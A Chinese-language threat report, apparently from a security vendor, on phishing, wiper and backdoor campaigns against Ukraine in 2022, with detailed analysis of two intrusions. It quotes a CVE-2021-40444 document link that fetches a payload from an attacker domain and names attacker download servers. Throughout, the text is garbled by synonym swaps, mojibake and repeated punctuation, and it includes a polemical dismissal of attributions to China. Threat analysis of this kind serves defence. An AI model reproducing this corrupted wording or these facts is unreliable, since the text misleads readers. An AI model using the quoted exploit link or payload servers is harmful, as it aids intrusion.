万利国际官网

首页 > 清静研究 > 研究报告 > 攻击与威胁剖析

【网络战】乌克兰战争下的最新网络攻击活动综合报告

宣布时间 2022-04-29

一、配景

自2022年2月24日俄乌冲突升级为周全战争后，，，，，俄罗斯试图通过“闪电战”的战术快速竣事战争的目的落空，，，，，直到2个多月的今天，，，，，此次战争仍处于胶着状态，，，，，俄乌双方均遭受到了很是严重的损失和伤亡。。。在残酷的战争之下，，，，，双方仍然一直地在网络战场上举行着强烈的较量。。。在战争爆发当日，，，，，万利国际官网ADLab就对双方网络战相关的威胁情报举行了整理，，，，，并且对乌克兰背后的网络攻击和相关情报活动举行深入剖析，，，，，宣布了相关剖析文章《乌克兰战争背后的网络攻击和情报活动》；；；在3月份我们应邀撰写了《【网络战】从乌克兰战争谈现代战争的第二战场》的长篇报告，，，，，连系历史上的对战争起着要害作用的网络战案例以及乌克兰和俄罗斯之间长达30年的网络对抗案例，，，，，周全剖析了现代战争下的网络战手艺、头脑、作用及影响；；；近期，，，，，我们又接连捕获到多起针对乌克兰政府和单位的网络攻击活动，，，，，攻击者借以“乌克兰防御方法”、“乌克兰报告_最终”、“日益重大的俄乌�；；；故汀焙汀靶孤兜目死锬妨止缱佑始允久魉箍诵椤钡染哂懈叨纫苫笮缘娜让庞斩牡稻傩泄セ�，，，，，试图窃取相关政府单位的神秘信息。。。

本文将对自战争以来我们所监控到的网络攻击事务举行梳理和汇总，，，，，同时从多个角度出发，，，，，对部分典范的网络攻击事务举行深入剖析。。。

二、近期攻击事务回首

自战争爆发以来，，，，，网络空间就成了俄乌双方博弈和交锋的第二战场，，，，，凭证乌克兰CERT近期宣布的新闻，，，，，乌克兰已经受到了至少12个黑客组织的攻击。。。在这些攻击中，，，，，黑客组织不但针对乌克兰政府、电信、国防、军队等要主要部分睁开网络攻击，，，，，甚至还直接对乌克兰能源等基建设施举行了破损性网络攻击。。。凭证万利国际官网ADLab的威胁情报数据及乌克兰CERT-UA的果真报告，，，，，我们对自2022年3月以来乌克兰所遭受的部分网络攻击清静事务举行了梳理和汇总，，，，，相关网络攻击事务的时间线如下图所示。。。现实上，，，，，这些统计的网络攻击事务仅仅是现实攻击情形的冰山一角；；；但仍不难看出，，，，，战争时代针对乌克兰的网络攻击者众多，，，，，其中不乏“InvisiMole”、“Vermin”、“APT-28”等著名黑客组织，，，，，相关网络攻击活动亦格外频仍。。。

图1.png

· 3月6日，，，，，万利国际官网ADLab监测到了一批针对乌克兰政府机构的网络攻击活动。。。在此次攻击活动中，，，，，攻击者使用携带恶意宏或误差恶意文件作为初始攻击载荷，，，，，诱使受害者信任并执行后续的QuasarRAT恶意木马，，，，，试图从受害主机中窃取敏感文件。。。乌克兰CERT也将此次事务的攻击者命名为“UAC-0086”，，，，，攻击者使用的部分诱饵文档如下所示。。。

（1）诱饵文档示例一：伪装成ISW（战争研究研究所）机构文件

图2.png

（2）诱饵文档示例二：伪装成“Hunter Biden,Burisma, and Corruption: The Impact on U.S.Government Policy and RelatedConcerns”（”亨特·拜登《糜烂:对美国政府政策的影响及相关关切》”）报告文件

图3.png

（3）诱饵文档示例三：“The increasinglycomplicated Russia-Ukraine crisis explained”（“日益重大的俄罗斯-乌克兰�；；；故汀保┍ǜ嫖募�

图4.png

· 3月7日，，，，，被乌克兰CERT命名为“UAC-0051”的黑客组织使用恶意软件MicroBackdoor对乌克兰多个国家部分和单位开展了多次网络攻击活动。。。其中，，，，，相关的诱饵文件和部分恶意文件代码如下图所示。。。

图5.png

· 3月9日，，，，，被乌克兰CERT命名为“UAC-0041”的黑客组织将“Лист про затвердження гарант??грошових кошт?в”（“现金担保批准函”）作为邮件问题，，，，，并以“战争和提供财务援助议题”为邮件内容，，，，，向乌克兰政府机构和单位举行大宗的投递。。。其中，，，，，“support letter.xlsx”邮件附件是携带宏代码的恶意文档，，，，，受害者一旦启用宏，，，，，该宏则会从攻击者的效劳器上下载Formbook/XLoader恶意程序，，，，，攻击者即可开展进一步的网络攻击活动。。。此次攻击活动的相关文件的详细信息如下图所示。。。

图6.png

· 3月11日，，，，，被乌克兰CERT命名为“UAC-0056”的黑客组织伪装成“sed-rada.gov.ua”（北顿涅茨克军民总署）向乌克兰国家机构大规模分发垂纶邮件。。。该邮件中包括两个诱饵文档，，，，，且邮件正文中宣称要求各机构从“https://forkscenter.fr”网站下载并装置防病毒软件的更新文件“BitdefenderWindowsUpdatePackage.exe”。。。当该EXE文件乐成执行后，，，，，最终会从指定效劳器上下载并执行GraphSteel和GrimPlant后门，，，，，以便攻击者完成进一步的网络窃密目的。。。此次攻击事务的相关文件如下图所示：

图7.png

图8.png

诱饵文档：“?нструкц?я з антив?русногозахисту.doc”（防病毒说明.doc）

图9.png

恶意软件下载页面

· 3月15日，，，，，ESET在乌克兰发明第三个破损性擦除器CaddyWiper，，，，，其中前两个破损型擦除器划分是于2月23日首次发明的HermeticWiper和在2月24日第二次发明的IsaacWiper。。。别的，，，，，与此擦除器相关的黑客组织也被乌克兰CERT命名为“UAC-0082”。。。破损性擦除器CaddyWiper中的“遍历磁盘文件并销毁”功效的代码如下图所示：

图10.png

图11.png

· 3月16日，，，，，疑似APT28（UAC-0028）黑客组织模拟泉源于UKR.NET新闻的垂纶邮件，，，，，邮件正文中使用URL短链接效劳建设的二维码，，，，，指导目的用户举行会见。。。一旦用户会见后，，，，，则会被重定向到伪装的UKR.NET密码重置页面的垂纶网站，，，，，继而通过HTTP POST请求将用户输入的数据发送到攻击者在Pipedream平台账户中。。。

图12.png

模拟来自UKR.NET的电子邮件内容

图13.png

UKR.NET密码重置伪造页面

图14.png

部分垂纶页面代码

· 3月17日，，，，，由Vermin (UAC-0020) 组织伪装为“乌克兰国防部”向乌克兰国家政府机构投递主题为“供应”的垂纶邮件。。。邮件中携带一个加密的RAR文件，，，，，压缩包中包括一个文件快捷方法和一个EXE文件，，，，，当翻开快捷方法时，，，，，将执行EXE文件。。。随后，，，，，受害者的主时机被恶意软件SPECTR攻击，，，，，该恶意软件包括：SPECTR.Usb、SPECTR.Shell、SPECTR.Fs、SPECTR.Info、SPECTR.Archiver等�？？？？？�。。。部分文件内容如下图所示。。。

图15.png

· 3月17日，，，，，UAC-0088组织使用 DoubleZero对乌克兰的部分企业举行网络攻击。。。在此次攻击事务中，，，，，被发明的压缩包名为“Вирус... крайне опасно!!!.zip”（“病毒...很是危险! ! !”），，，，，该压缩包包括两个文件：cpcrs.exe和csrss.exe。。。通太过析发明，，，，，它们使用C#编写并被归类为DoubleZero病毒。。。该病毒会笼罩磁盘上所有的非系统文件，，，，，并凭证一定的顺序举行重写。。。

图16.png

图17.png

· 3月18日，，，，，InvisiMole（UAC-0035）组织针对乌克兰国家政府机构和国防单位提倡了鱼叉式网络垂纶邮件攻击。。。邮件附件是名为“501_25_103.zip”的压缩包文件，，，，，其中包括501_25_103.lnk快捷方法。。。当运行恶意快捷方法时，，，，，该快捷方法会会见攻击者效劳器并下载和执行HTA文件。。。之后，，，，，HTA文件再从黑客效劳器上下载并运行诱饵文档501_25_103.doc和后门程序LoadEdge。。。

图18.png

诱饵文档内容

· 3月22日，，，，，Scarab APT组织（UAC-0026）使用 HeaderTip 恶意软件提倡针对乌克兰政府部分和单位的网络攻击。。。万利国际官网ADLab最初捕获到了名为“Прозбереження в?деоматер?ал?в з ф?ксац??ю злочинних д?й арм??рос?йсько?федерац??.rar”的压缩包文件，，，，，内里包括同名的EXE文件。。。该恶意文件执行后会释放并翻开无害的诱饵文档（“#2163_02_33-2022.pdf”），，，，，同时释放和执行批处置惩罚文件（“officecleaner.bat”），，，，，之后，，，，，bat文件释放“httpshelper.dll”恶意文件，，，，，并挪用rundll32.exe执行该恶意木马。。。

图19.png

压缩包文件内容

图20.png

诱饵文档相关内容

· 3月23日，，，，，疑似UNC1151黑客组织（UAC-0051）使用恶意软件Cobalt Strike Beacon对乌克兰国家部分和单位举行网络攻击。。。被发明的恶意压缩包名为“Диверсанти.rar”，，，，，其包括名为“Диверсанти 21.03.rar”的压缩包，，，，，而该压缩包又包括“Диверсанти filerar.scr” 的SFX文件，，，，，似乎借以隐藏文件的.scr扩展名。。。此次攻击事务中的sfx文件包括诱饵文档和图片，，，，，以及恶意VBS代码。。。该恶意vbs代码会建设和运行名为“dhdhk0k34.com”的 .NET程序，，，，，最终执行Cobalt Strike Beacon木马，，，，，相关的恶意文件内容如下图所示:

图21.png

SFX文件内容

图22.png

相关诱饵文档内容

图23.png

相关诱饵图片

图24.png

混淆后的恶意vbs代码

· 3月28日，，，，，UAC-0056组织针对乌克兰政府（包括私人电视频道ICTV）投递主题为“Заборгован?сть по зарплат?”（“拖欠人为”）的垂纶邮件，，，，，该垂纶邮件中包括Excel文档的附件文件与邮件主题名称相同，，，，，使受害人镌汰预防然后翻开恶意文件。。。该恶意文档中包括一个嵌入的宏，，，，，以及部分隐藏在表格中的有用载荷。。。

图25.png

图26.png

该恶意宏代码会释放并执行初始可执行文件“Base-Update.exe”，，，，，该程序被执行后会从黑客效劳器194[.]31.98.124上下载并执行下一阶段黑客将使用的木马“java-sdk.exe”。。。其中，，，，，java-sdk.exe的主要功效是实现一连化，，，，，并从黑客效劳器194[.]31.98.124下载安排接下来将使用的恶意程序“oracle-java.exe”与“microsoft-cortana.exe”。。。

其中，，，，，“oracle-java.exe”（Elephant Implant/被称为GrimPlant后门）是此次攻击中最主要的恶意程序，，，，，Implant可以通过4种RPC请求与C2举行通讯，，，，，向C2发送信息并且吸收相关指令，，，，，相关RPC请求如下所示：

图27.png

而“microsoft-cortana.exe”则是一个数据窃取软件，，，，，其主要功效包括网络受害者主机名、操作系统名称（windows）、CPU数目、IP地点、名称、用户名和主目录、浏览器凭证、无线网络信息、凭证治理器数据、邮件帐户、Putty毗连数据、Filezilla 凭证以及受害者用户目录中所有文件，，，，，并举行哈希处置惩罚，，，，，发送到指定的C2效劳器上。。。

· 3月30日，，，，，被乌克兰CERT命名为“UAC-0041”的黑客组织以“Нова програма для запису в журналi.”（“新期刊录入妄想”）为主题对乌克兰政府机构和单位举行大宗的垂纶邮件攻击。。。邮件正文中包括关于“електронних навчальних журнал?в”（“电子学习期刊”）的相关信息，，，，，以及MarsStealer木马的下载链接和文档密码。。。其中，，，，，MarsStealer木马是一种常见的商业木马，，，，，其主要功效包括网络被熏染主机的敏感信息，，，，，从浏览器中窃取用户的身份验证数据，，，，，从加密钱包插件或多因素身份验证程序中窃取文件，，，，，下载和运行可执行文件并截取屏幕截图。。。

图28.png

· 4月4日，，，，，被乌克兰CERT命名为“UAC-0010”（疑似Armageddon）的黑客组织针对乌克兰政府机构发送主题为“?нформац?я щодо в?йськових злочинц?в РФ”（译：俄罗斯联邦战犯纪录）的垂纶邮件，，，，，邮件附件为“В?йськов?злочинц?РФ.htm”（译：俄罗斯联邦的战犯.htm）。。。

图29.png

若是受害者翻开该htm文件，，，，，其浏览器则会自动下载“Viyskovi_zlochinci_RU.rar”。。。

图30.png

该压缩包包括一个名为“В?йськов?-злочинц? що знищують Укра?ну (домашн?адреси, фото, номера телефон?в, стор?нки у соц?альних сетях)”（译：“摧毁乌克兰的战犯（家庭住址，，，，，照片，，，，，电话号码，，，，，社交网站中的页面）”）的lnk文件。。。

图31.png

该lnk文件将会从黑客效劳器上下载下一阶段的攻击武器，，，，，即一个包括VB代码的HTA文件。。。此HTA文件会从黑客效劳器上下载get.php，，，，，而该文件现实上却是一个powershell剧本，，，，，其主要用于确定盘算机的唯一标识符。。。

图32.png

· 4月12日，，，，，被披露由俄罗斯国家资助的APT组织Sandworm（乌克兰CERT命名为“UAC-0082”）使用恶意程序 INDUSTROYER2 和 CADDYWIPER，，，，，在4月8日试图对一家大型乌克兰能源供应商举行攻击。。。此次攻击事务的详细时间节点如图所示：

图33.png

从相关事务的剖析报道中可以推测出攻击者的部分目的：

（1）使用恶意程序INDUSTROYER2针对高压变电站举行攻击，，，，，每个可执行文件中均含一组静态指定的各个变电站的唯一参数，，，，，可以看出此恶意程序为高度定制化的攻击工具。。。

图34.png

（2）使用CADDYWIPER恶意程序对目的的Windows系统的盘算机举行破损攻击。。。

（3）使用恶意破损型剧本ORCSHRED、SOLOSHRED、AWFULSHRED对企业内部的Linux系统的效劳器举行破损攻击。。。

· 4月14日，，，，，被乌克兰CERT命名为“UAC-0098”的黑客组织使用名为“Моб?л?зац?йний ре?стр.xls”（“发动挂号册.xls”）的恶意文件对乌克兰组织举行大规模网络垂纶攻击活动。。。一旦受害者翻开文档并启用宏，，，，，恶意宏代码会下载并执行名为“spisok.exe”的恶意代码。。。其中，，，，，该“spisok.exe”恶意程序会释放运行GzipLoader恶意软件，，，，，并且从黑客效劳器上下载并运行IcedID恶意程序，，，，，举行进一步的信息窃密活动。。。

图35.png

三、典范攻击事务剖析

陪同俄乌冲突时势的一直恶化，，，，，近期瞄准乌克兰的网络攻击活动显着增多。。。本节从上述众多针对乌克兰举行的网络攻击事务中，，，，，划分选取万利国际官网ADLab在2022年3月6日和3月22日监测到的两起攻击事务为例，，，，，举行详细的手艺剖析。。。

3.1 攻击事务一

2022年3月6日，，，，，万利国际官网ADLab检测到一批针关于乌克兰的网络攻击样本，，，，，攻击者借以“乌克兰防御方法”、“乌克兰报告_最终”、“日益重大的俄乌�；；；故汀焙汀靶孤兜目死锬妨止缱佑始允久魉箍诵椤钡染哂懈叨纫苫笮缘娜让庞斩牡稻傩泄セ�，，，，，以此诱使受害者信任并执行后续的恶意木马。。。

通过对攻击者的溯源和关联剖析，，，，，我们整理了其在此次攻击活动中使用的恶意文件。。。详细信息如下表所示。。。

图36.png

3.1.1 攻击载荷

在此次活动的初始攻击环节中，，，，，攻击者主要使用了三种名堂的攻击载荷，，，，，其中包括携带恶意宏的恶意文档、携带误差的恶意文档和恶意压缩包文件。。。

（1）携带恶意宏的恶意文档

该恶意文档以“Leaked Kremlin emails show Minsk protocol designed as path toUkraine's capitulation”（译：“泄露的克里姆林宫电子邮件显示，，，，，明斯克协议被设计成乌克兰投降的途径”）作为诱饵内容，，，，，并提醒受害者“启用宏”。。。详细内容如下图所示。。。

图37.png

当受害者翻开该文档并启用宏代码功效后，，，，，将自动挪用Document_Open函数，，，，，其主要功效为提取并执行生涯在UserForm1中的powershell指令。。。

图38.png

对powershell后面的代码举行Base64解码后，，，，，获得了混淆后的ps剧本。。。详细内容如下图所示。。。

图39.png

在对该剧本举行去混淆处置惩罚后，，，，，可以看到该powershell指令的主要功效为从指定的url列表中下载“SoftwareUpdate.exe”，，，，，再将其生涯到%TEMP%目录并命名为“update.exe”。。。

图40.png

（2）恶意压缩包文件

另一种类型是RAR压缩包文件，，，，，攻击者将其命名为“The increasinglycomplicated Russia-Ukraine crisis explained”，，，，，该压缩文件包括用于疑惑受害者的正常pdf诱饵文档以及伪装成pdf文件图标的二进制可执行恶意程序（通过修改exe图标为文档来诱导受害者点击）。。。

正常pdf诱饵文档的部分内容如下图所示。。。

图42.png

（3）携带误差的恶意文档

攻击者在此次攻击行动中使用的是office误差cve-2021-40444，，，，，该误差是微软于2021年9月宣布的一个MicrosoftMSHTML远程代码执行误差。。。攻击者可制作一个由托管浏览器泛起引擎的 Microsoft Office 文档使用的恶意 ActiveX 控件，，，，，之后诱导用户翻开恶意文档，，，，，则可在目的系统上以该用户权限执行恣意代码。。。

我们将携带误差的恶意文档解压后，，，，，在rels的document.xml文件中发明了可疑的下载链接：Target="mhtml:https://web.sunvn.net/QYWI6LH4M71O.html!x-usc:https://web.sunvn.net/QYWI6LH4M71O.html"。。。

图43.png

实验下载该QYWI6LH4M71O.html文件，，，，，发明效劳器已无法会见了，，，，，履历证该域名已经失效。。。

在进一步的剖析后，，，，，我们发明攻击者使用了定制的POC模板举行批量自动化天生恶意文档，，，，，且对各误差文档中包括的下载链接所指向的html均举行了随机化处置惩罚。。。

图44.png

3.1.2 后门剖析

现在，，，，，万利国际官网ADLab监测到黑客组织使用了恶意木马QuasarRAT来实现窃密、远程控制等恶意行为。。。该木马是一种果真可用的开源远程会见木马，，，，，主要针对Windows操作系统。。。其最初是由GitHub用户 MaxXor 开发，，，，，用于正当用途。。。然而，，，，，该工具以后被黑客用于种种网络特工活动。。。该木马提供的部分远程功效菜单如下图所示。。。

图45.png

详细功效如下表所示。。。

图46.png

3.2 攻击事务二

2022年3月22日，，，，，万利国际官网ADLab捕获到一个针对乌克兰的攻击样本。。。攻击者通过类似“关于生涯俄罗斯联邦军队犯法行为的视频纪录”等具有疑惑性的文件名来诱使受害者执行恶意木马，，，，，以此抵达对特定攻击目的实验入侵的目的。。。我们对此次攻击活动的线索举行了深入的追踪和溯源剖析，，，，，发明其与历史悠久的Scarab黑客组织具有一定的相似性。。。

3.2.1 溯源剖析

我们以后次黑客组织所使用的基础设施及攻击手法等层面举行关联剖析，，，，，并连系该组织早期攻击活动中的相关特征，，，，，得出了下面几处主要的关联点。。。

（1）基础设施

通过提取所有样本中的C2效劳器，，，，，我们发明攻击者在此次活动中所使用的回联域名，，，，，是在ChangeIp.com平台上免费注册的三级子域（该平台提供的免费域现实上是二级域，，，，，如下图所示）。。。

图47.png

为了确定攻击者所属组织，，，，，我们对木马举行溯源剖析，，，，，找到了其他的同源木马。。。审查这些域名的注册信息，，，，，我们发明这些木马所使用的C2也均是在ChangeIp.com平台举行注册的。。。并且已被标注为所属Scarab黑客组织。。。在早期的攻击活动中，，，，，该黑客组织险些完全是通过动态域名系统（DDNS）域来执行下令和控制（C&C）操作。。。详细如下图所示。。。

图48.png

（2）攻击手法

攻击者在此次攻击活动中，，，，，是以恶意压缩包作为攻击载荷，，，，，虽然我们未能确定该文件是否通过电子邮件举行投递。。。但通过对Scarab黑客组织早期的攻击载荷举行周全地网络和剖析后，，，，，我们视察到该组织惯于使用压缩包作为第一阶段的诱饵文档。。。详细如下图所示。。。

图49.png

别的，，，，，黑客组织在早期攻击活动中，，，，，是通过压缩包中的恶意文档来睁开下一阶段的攻击行动，，，，，文档中都包括相同的提醒�？？？？？�。。。详细内容如下图所示。。。

图50.png

而在此次活动中，，，，，攻击者改用了与压缩包同名的EXE可执行文件来举行入侵行为。。。但与早期手法相似的是，，，，，在执行完此阶段的攻击载荷后，，，，，其都会在%TMP%目录下写入并翻开一个无害的与主题相关的文档，，，，，用以疑惑受害者。。。详细如下图所示。。。

图51.png

除了以上枚举出的攻击手法同Scarab黑客组织具有一定的重叠性以外，，，，，在后续攻击中攻击者使用到的恶意剧本和木马（包括文件名称和内容）均为该组织所有。。。

图52.png

图53.png

基于该组织的域名使用喜欢、攻击手法和入侵战略等方面的比照剖析，，，，，我们起源判断本次的攻击活动来自Scarab黑客组织。。。值得注重的是，，，，，Scarab黑客组织曾被部分外洋公司标记为来自中国的黑客组织。。。然而，，，，，我们对这些公司提供的详细报告和所谓的证据举行仔细剖析后发明，，，，，所谓的证据不过是无法提供的“基于语言的资源”和诱饵文档中的中文“用户”二字，，，，，这显然太过牵强，，，，，我们并不知道该公司把攻击归罪于中国的目的是什么，，，，，但这种“凭证无力的证据就把网络攻击归罪于中国”的牵强逻辑并不少见，，，，，其背后的推手及其目的早已昭然若揭。。。

3.2.2 手艺剖析

此次攻击活动中，，，，，万利国际官网ADLab捕获到了该组织使用RAR文件的方法来睁开攻击。。。我们虽未能确定该恶意文件的泉源，，，，，但凭证以往的攻击，，，，，可以推断Scarab组织有可能是使用垂纶邮件，，，，，将压缩包作为附件从而举行攻击行动。。。当压缩包中的exe文件被执行后，，，，，会释放并翻开无害的诱饵pdf文档，，，，，同时在%TEMP%目录下写入并执行“officecleaner.bat”批处置惩罚文件。。。之后，，，，，bat文件则在同目录下释放“httpshelper.dll”恶意文件，，，，，并挪用rundll32.exe执行恶意木马。。。单从功效来看，，，，，此木马仅包括简朴的上传下载文件、设置休眠时间等，，，，，可是，，，，，其可直接从下令和控制（C2）效劳器上，，，，，下载加载特定功效�？？？？？槔唇徊降闹葱卸褚獠僮�。。。

（1）初始载荷

万利国际官网ADLab最初发明的RAR文件，，，，，名称为“прозбереженнявзеоматер?ал?взф?ксац?шйарм?ш?Рос?йськоюфедерац?????.rar”（译：“关于生涯俄罗斯联邦军队犯法行为的视频纪录.rar”），，，，，压缩包中包括一个同名的EXE可执行文件。。。

图54.png

当恶意EXE文件执行后，，，，，会从其资源节中读取指定的数据并写入到用户电脑%TEMP%目录下，，，，，该文件是名为“#2163_02_33-2022.pdf”（来自于乌克兰国家警员局的来信）的诱饵文件，，，，，随后再执行CMD下令翻开此文件。。。文件详细内容如下图所示。。。

图55.png

图56.png

接着，，，，，再次读取指定的资源数据，，，，，并将其写入到%TEMP%目录下，，，，，命名为“officecleaner.bat”。。。内容如下图所示。。。

图57.png

最后，，，，，使用CMD下令将BAT文件添加到注册表启动项，，，，，以确保该批处置惩罚文件的长期性。。。

图58.png

（2）bat批处置惩罚文件

“officecleaner.bat”的主要功效为，，，，，替换%TMP%目录下“officecleaner.bat”的MZ头部并在同目录下写入“httpshelper.dll”文件，，，，，之后删除bat批处置惩罚文件，，，，，以及添加开机启动项确保此DLL文件的长期化。。。

图59.png

（3）恶意木马

DLL文件在DllMain入口处，，，，，会先判断其自身的加载程序是否为“rundll32.exe”。。。当判断效果为true时，，，，，则挪用dll的主功效导出函数“OAService”。。。

图60.png

该主功效函数首先通过PEB动态获取后期所使用的API函数。。。

图61.png

之后获取系统目录的卷序列号并举行生涯。。。

图62.png

接着，，，，，将获取到的序列号举行名堂化后发送给黑客组织的效劳器。。。

图63.png

当与效劳器乐成毗连后，，，，，则凭证效劳器的控制指令来举行响应的操作。。�？？？？？刂浦噶罱霞蚱�，，，，，包括上传文件、下载文件、吸收发送指定命据和指定休眠时间等。。。

图64.png

四、总结

俄乌战争爆发以来，，，，，双方除了在实地战场举行交锋外，，，，，在网络空间战场中举行的博弈也愈加强烈；；；不难发明，，，，，网络空间战已成为现代战争的主要组成部分，，，，，网络战对现代战争时势的影响同样主要。。。在俄乌战争周全爆发之前，，，，，双方在网络空间战场就早已交锋，，，，，只不过网络战爆发于一个“无声的并且没有硝烟的战场”，，，，，并不为公众所关注，，，，，但其对实地战争的影响却举足轻重；；；好比，，，，，在乌俄战争爆发当天，，，，，俄罗斯对乌克兰的部分军事基地举行“定点扫除攻击”，，，，，直接导致乌克兰失去在第一时间内还击的能力，，，，，此“定点扫除攻击”背后所涉及的情报很可能就是从网络战中获�。。�；；；战争周全爆发后，，，，，双方在网络战场的交锋越发强烈，，，，，种种网络攻击事务频发，，，，，网络攻击一方面能够窃取敌手手中与战争细密相关的神秘信息，，，，，另一方面破损网络和其他基础设施也能震慑敌手，，，，，扰乱敌手对实地战局的时势判断，，，，，从而影响战局走势。。。连系本次攻击活动剖析及以往我们对乌克兰遭受的黑客攻击的剖析——《乌克兰战争背后的网络攻击和情报活动》和《针对乌克兰边防局和国防部攻击活动深度剖析》，，，，，可以看出，，，，，网络空间战着实比实地战争爆发的时间更早，，，，，战线更长并且隐藏，，，，，网络空间清静对国家清静的主要性不言而喻。。。

上一篇下一篇

7*24小时效劳热线

400-624-3900

官方微信

官方微博

网御星云合众数据书生电子云子可信

执法声明

Copyright ? 万利国际官网版权所有京ICP备05032414号京公网安备11010802024551号

【网站地图】【sitemap】